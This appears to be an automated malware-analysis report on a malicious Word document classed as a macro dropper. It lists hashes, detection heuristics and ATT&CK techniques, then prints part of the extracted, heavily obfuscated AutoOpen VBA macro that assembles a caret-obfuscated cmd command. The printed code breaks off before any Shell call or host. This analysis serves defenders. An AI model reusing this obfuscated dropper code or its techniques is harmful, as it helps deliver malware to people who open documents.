Office (OLE) malware analysis — malicious · e429bf665c340744

MALICIOUS

Office (OLE)

91.1 KB Created: 2018-08-28 09:30:00 Authoring application: Microsoft Office Word First seen: 2019-05-10

MD5: efa168540687071f04b2e75ebc2d1c3e SHA-1: 3dc99be4b9a53ffa105a102b28b079dcb039d14c SHA-256: e429bf665c3407447ba3fb8ae73b912e82c6cad6f211fa81bc9450af785cd2ff

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro with an AutoOpen function. This macro utilizes the Shell() function, a critical indicator of malicious intent, suggesting it's designed to download and execute a secondary payload. The presence of the 'Doc.Dropper.Valyria-6665650-0' ClamAV signature further supports its classification as a dropper.

Heuristics 7

ClamAV: Doc.Dropper.Valyria-6665650-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Valyria-6665650-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12002 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	12002 bytes
SHA-256: `4ee5cff1227b54e1138c07da3db83c9ecedfe20f4612e071a4a68ee2e8b17500`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "GftfQPiRZId" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "TVvHWaP" Function lWQDZBw() On _ Error _ Resume _ Next On _ Error _ Resume _ Next On _ Error _ Resume _ Next On _ Error _ Resume _ Next On _ Error _ Resume _ Next On _ Error _ Resume _ Next Error 50074 / THdOU cBOQwUzJYk = "MD /v" + "^:^o /" + "c " + Chr(5 + 2 + 1 + 5 + 21) + " " + "^S^" + "et " + "^ ^ 6" + "^8" + "^FE=^A^" Error 5601 / wtdJk Error 50019 * 88335 / 14501 / DzdDOo Error 43819 * 70449 / 73934 / wuEtMS Error wHETpL / uvmEXG / bGAjIq * vuGKwo Error 5990 / HdkjP ZspWEST = "AC" + "A^g^" + "AA^" + "IA^" + "ACA^gA^" + "A" Error zJsXw * BiaTJ / YrLuF * URJav WqzPtVZtH = "^IA" + "A" + "CA^g^" + "AAI^AAC" + "A^g" + "^AA^I^A" + "^AC^" + "A^" + "gAAI" + "^A^ACA" + "gA^" + "Q^f^A" + "^0H" Error bAiUTm / qRfwja Error 53343 / Fviku DHzYNHfafcq = "^A^" + "7" + "^BA^a" + "^A^" + "MG" + "A0^BQ^Y" + "^" + "A^M^G" Error jqDUzd / kVTuQ / wsntR / uHvaF Error 67722 / SqjDX Error lSsAAG * Wqiajz Error IuLjBl * aJtzCO * 11284 * iXhFqw LbXBcupTs = "A" + "9^BwOA^" + "sG^" + "A" + "^hB^Q^Z" Error FmJIo / JljOVn * 18872 * WfQpdD Error 75136 / zqYdA Error 91055 * OlijlP Error DVGYo * Jlanz * qCGJZX / zIziwQ Error kdJiP * 92990 / XmzHp * iVKNV EozqB = "^A^I" + "H^A^iB" + "^w^O^A^" + "8^G^Am^" + "B^QRAQC" + "^A^g^A" + "Q^b" + "AU" + "G" Error 2243 / lnToXb * 38409 / THptXs Error zJJbVi * KIBUFz Error 17363 / qKwfDn / 13460 / 6079 piWjEMPM = "^A^" + "0^B^Q" + "S^A" + "0CA^" + "l^B^w" + "^aA8G^A" Error 15047 * pmmPE Error pmYLPw * PklYXp wlNJwWGsvIk = "2^Bg" + "bAk" + "E^A^7^" + "AQK^A^8" + "^GA^m^" Error 67093 * ibzjYu * 33525 * JBvZRQ Error JCOiz * kTNhq Error hiNRCM / KPYAFJ / nafLH / PYmip IDqaobhc = "BQR^" + "A^QC^A" + "gAA^L^A" + "YGA^" + "U^" + "B^" + "g^e^" lWQDZBw = cBOQwUzJYk + ZspWEST + WqzPtVZtH + DHzYNHfafcq + LbXBcupTs + EozqB + piWjEMPM + wlNJwWGsvIk + IDqaobhc Error 40127 / 88680 * 10948 / GiJsj Error QZHmji / 83677 Error 24710 * auUBPA * URaRu * QAuLiC Error UUXpdj * tHbGO Error SjpLuh * TkotzZ End Function Function rcEqw() On _ Error _ Resume _ Next On _ Error _ Resume _ Next On _ Error _ Resume _ Next On _ Error _ Resume _ Next Error HVZss * HjPVWG Error lqDTD * 26442 Error mOjUSq / BGzwp / 57658 / EIoUJ Error DAUtE / 47577 waATqiB = "AQCA^o" + "^AQ" + "^Z" + "^" + "Aw^" + "GAp^BgR" + "AQG" + "^A^" + "h^B^wb" + "^A^" Error BUrdbi / KBITaE * bujioZ * tOjbYi Error KPTtk / kJYnA Error zYiitG / 53884 Error JtsTGX / WHPUl cSETwHw = "wG^A" + "^u^Bw^" + "d^A^" + "8G" + "^A" + "^E^" + "B^g^L^" + "A" Error 36140 / 37581 Error 400 / FSvPO Error KCCzQ / 55560 * OaHwQG * 46108 Error 91359 * ERIfzO ORSWkWjtfJ = "YE^A^D^" + "BgV^A^" + "QC" + "^" + "A^" + "7B^Qe^" Error 89953 / 39394 / MhFTNO * CtuXCB Error 77267 / SKpST Error 24780 / UPUvo Error tVpCBs * XFwSf / Idwkd / kSPlF Error 56235 * SWrTE TQzZoNMZU = "A" + "IH^" + "A^" + "0Bwe" + "A^kC^" + "AyB^g^U" + "A8^" + "GA^k^A" + "^A^IA4" Error 99762 / jGKasK Error VujOtQ / mYjuYi * 69486 * WMjtMQ imJHjzHHrCh = "^G" + "A^pB^" + "AI^AYG" + "^A^UB^" + "g^" + "eA^" + "QC^" + "A" + "^o^" + "AA" Error mVGXGw / 68337 / unfnGW / OVKQOU Error 15659 * PLzZR / NCujp / 8596 Error nOrzN / 71393 * 31515 * iiboW TwHoloMnl = "a" + "^A^MGA" + "h" + "^BQ" + "^Z^A" + "I^" Error 17832 * NzTIP / 98229 * EdhAE Error KjaQJu * wqIjNf Error 66414 / 44660 IvMMtlCXB = "H^Av" + "^" + "B^g^" + "Z^" + "AsD" rcEqw = waATqiB + cSETwHw + ORSWkWjtfJ + TQzZoNMZU + imJHjzHHrCh + TwHoloMnl + IvMMtlCXB Error 24933 / ZkhOKJ Error 61447 / iuIOs * 69123 * IEFCar Error buaRHl / izhaU / iaYUq / zbHJi End Function Function XmwKUJnQi() On _ Error _ Resume _ ... (truncated)

SHA-256: 4ee5cff1227b54e1138c07da3db83c9ecedfe20f4612e071a4a68ee2e8b17500

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "GftfQPiRZId"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "TVvHWaP"
Function lWQDZBw()

On _
Error _
Resume _
Next

On _
Error _
Resume _
Next

On _
Error _
Resume _
Next

On _
Error _
Resume _
Next

On _
Error _
Resume _
Next

On _
Error _
Resume _
Next
Error 50074 / THdOU
cBOQwUzJYk = "MD  /v" + "^:^o /" + "c  " + Chr(5 + 2 + 1 + 5 + 21) + " " + "^S^" + "et " + "^ ^  6" + "^8" + "^FE=^A^"
Error 5601 / wtdJk
   Error 50019 * 88335 / 14501 / DzdDOo
   Error 43819 * 70449 / 73934 / wuEtMS
   Error wHETpL / uvmEXG / bGAjIq * vuGKwo
   Error 5990 / HdkjP
ZspWEST = "AC" + "A^g^" + "AA^" + "IA^" + "ACA^gA^" + "A"
Error zJsXw * BiaTJ / YrLuF * URJav
WqzPtVZtH = "^IA" + "A" + "CA^g^" + "AAI^AAC" + "A^g" + "^AA^I^A" + "^AC^" + "A^" + "gAAI" + "^A^ACA" + "gA^" + "Q^f^A" + "^0H"
Error bAiUTm / qRfwja
   Error 53343 / Fviku
DHzYNHfafcq = "^A^" + "7" + "^BA^a" + "^A^" + "MG" + "A0^BQ^Y" + "^" + "A^M^G"
Error jqDUzd / kVTuQ / wsntR / uHvaF
   Error 67722 / SqjDX
   Error lSsAAG * Wqiajz
   Error IuLjBl * aJtzCO * 11284 * iXhFqw
LbXBcupTs = "A" + "9^BwOA^" + "sG^" + "A" + "^hB^Q^Z"
Error FmJIo / JljOVn * 18872 * WfQpdD
   Error 75136 / zqYdA
   Error 91055 * OlijlP
   Error DVGYo * Jlanz * qCGJZX / zIziwQ
   Error kdJiP * 92990 / XmzHp * iVKNV
EozqB = "^A^I" + "H^A^iB" + "^w^O^A^" + "8^G^Am^" + "B^QRAQC" + "^A^g^A" + "Q^b" + "AU" + "G"
Error 2243 / lnToXb * 38409 / THptXs
   Error zJJbVi * KIBUFz
   Error 17363 / qKwfDn / 13460 / 6079
piWjEMPM = "^A^" + "0^B^Q" + "S^A" + "0CA^" + "l^B^w" + "^aA8G^A"
Error 15047 * pmmPE
   Error pmYLPw * PklYXp
wlNJwWGsvIk = "2^Bg" + "bAk" + "E^A^7^" + "AQK^A^8" + "^GA^m^"
Error 67093 * ibzjYu * 33525 * JBvZRQ
   Error JCOiz * kTNhq
   Error hiNRCM / KPYAFJ / nafLH / PYmip
IDqaobhc = "BQR^" + "A^QC^A" + "gAA^L^A" + "YGA^" + "U^" + "B^" + "g^e^"
lWQDZBw = cBOQwUzJYk + ZspWEST + WqzPtVZtH + DHzYNHfafcq + LbXBcupTs + EozqB + piWjEMPM + wlNJwWGsvIk + IDqaobhc
   Error 40127 / 88680 * 10948 / GiJsj
   Error QZHmji / 83677
   Error 24710 * auUBPA * URaRu * QAuLiC
   Error UUXpdj * tHbGO
   Error SjpLuh * TkotzZ
End Function
Function rcEqw()

On _
Error _
Resume _
Next

On _
Error _
Resume _
Next

On _
Error _
Resume _
Next

On _
Error _
Resume _
Next
Error HVZss * HjPVWG
   Error lqDTD * 26442
   Error mOjUSq / BGzwp / 57658 / EIoUJ
   Error DAUtE / 47577
waATqiB = "AQCA^o" + "^AQ" + "^Z" + "^" + "Aw^" + "GAp^BgR" + "AQG" + "^A^" + "h^B^wb" + "^A^"
Error BUrdbi / KBITaE * bujioZ * tOjbYi
   Error KPTtk / kJYnA
   Error zYiitG / 53884
   Error JtsTGX / WHPUl
cSETwHw = "wG^A" + "^u^Bw^" + "d^A^" + "8G" + "^A" + "^E^" + "B^g^L^" + "A"
Error 36140 / 37581
   Error 400 / FSvPO
   Error KCCzQ / 55560 * OaHwQG * 46108
   Error 91359 * ERIfzO
ORSWkWjtfJ = "YE^A^D^" + "BgV^A^" + "QC" + "^" + "A^" + "7B^Qe^"
Error 89953 / 39394 / MhFTNO * CtuXCB
   Error 77267 / SKpST
   Error 24780 / UPUvo
   Error tVpCBs * XFwSf / Idwkd / kSPlF
   Error 56235 * SWrTE
TQzZoNMZU = "A" + "IH^" + "A^" + "0Bwe" + "A^kC^" + "AyB^g^U" + "A8^" + "GA^k^A" + "^A^IA4"
Error 99762 / jGKasK
   Error VujOtQ / mYjuYi * 69486 * WMjtMQ
imJHjzHHrCh = "^G" + "A^pB^" + "AI^AYG" + "^A^UB^" + "g^" + "eA^" + "QC^" + "A" + "^o^" + "AA"
Error mVGXGw / 68337 / unfnGW / OVKQOU
   Error 15659 * PLzZR / NCujp / 8596
   Error nOrzN / 71393 * 31515 * iiboW
TwHoloMnl = "a" + "^A^MGA" + "h" + "^BQ" + "^Z^A" + "I^"
Error 17832 * NzTIP / 98229 * EdhAE
   Error KjaQJu * wqIjNf
   Error 66414 / 44660
IvMMtlCXB = "H^Av" + "^" + "B^g^" + "Z^" + "AsD"
rcEqw = waATqiB + cSETwHw + ORSWkWjtfJ + TQzZoNMZU + imJHjzHHrCh + TwHoloMnl + IvMMtlCXB
   Error 24933 / ZkhOKJ
   Error 61447 / iuIOs * 69123 * IEFCar
   Error buaRHl / izhaU / iaYUq / zbHJi
End Function
Function XmwKUJnQi()

On _
Error _
Resume _
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.